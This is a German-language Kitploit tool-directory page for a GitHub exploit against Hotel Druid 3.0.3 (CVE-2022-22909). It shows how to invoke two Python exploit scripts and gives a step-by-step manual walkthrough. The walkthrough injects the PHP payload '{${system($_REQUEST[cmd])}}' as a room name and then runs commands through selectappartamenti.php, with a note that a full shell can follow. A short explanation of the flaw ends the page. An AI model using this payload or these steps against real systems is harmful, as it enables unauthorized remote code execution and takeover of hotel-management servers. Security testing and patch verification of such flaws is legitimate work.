Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/kaal18/cve-2022-22909
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRemote-Access-Tool
GitHubkaal18/cve-2022-22909

CVE-2022-22909

Python-basierter Exploit für Hotel Druid 3.0.3 Remote-Codeausführung (CVE-2022-22909). Injiziert PHP-Payloads über Zimmernamen, um Befehlsausführung und Shell-Zugriff auf anfällige Ziele zu erreichen.

Repository anzeigen
242vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-22909 Hotel Druid 3.0.3 - Remote Code Execution (RCE)

Exploit von kaal

Exploits

  1. HotelDruidExploit.py

Dieser Exploit erstellt einen neuen Raum mit unserem PHP-Payload als Raumnamen.

Verwendung: $ ./HotelDruidExploit.py -h

image

$ ./HotelDruidExploit.py -u http://127.0.0.1/hoteldruid

image


  1. HotelDruidExploitRoom.py

Dieser Exploit funktioniert, wenn Sie den Raumnamen bereits kennen.

Verwendung: $ ./HotelDruidExploitRoom.py -u "http://127.0.0.1/hoteldruid" -r "abc"

image


Exploit-Walkthrough:

1). Navigieren Sie zur Hotel Druid-Seite.

2). Klicken Sie auf Tabellen -> Räume

image

3). Fügen Sie im Feld „Neuen Raum erstellen“ den folgenden PHP-Code ein und klicken Sie auf „Hinzufügen“.

{${system($_REQUEST[cmd])}}

image

4). Sie sehen einen neuen Raum mit unserem Payload im Feld „Raumname“.

image

5). Rufen Sie den folgenden Link auf und Sie erhalten eine Befehlsausführung. Später können Sie eine vollständige Shell erhalten.

http://127.0.0.1/hoteldruid/dati/selectappartamenti.php?cmd=whoami

Hinweis: Ersetzen Sie die IP durch die IP Ihres Hotel-Druid-Ziels.

Schwachstellenbeschreibung:

Diese Schwachstelle tritt auf, weil Raumnamen in /var/www/html/hoteldruid/dati/selectappartamenti.php gespeichert werden.

image

Und selectappartamenti.php ist eine PHP-Datei, daher wird jeder PHP-Code in dieser Datei vom Server ausgeführt.

Tool herunterladen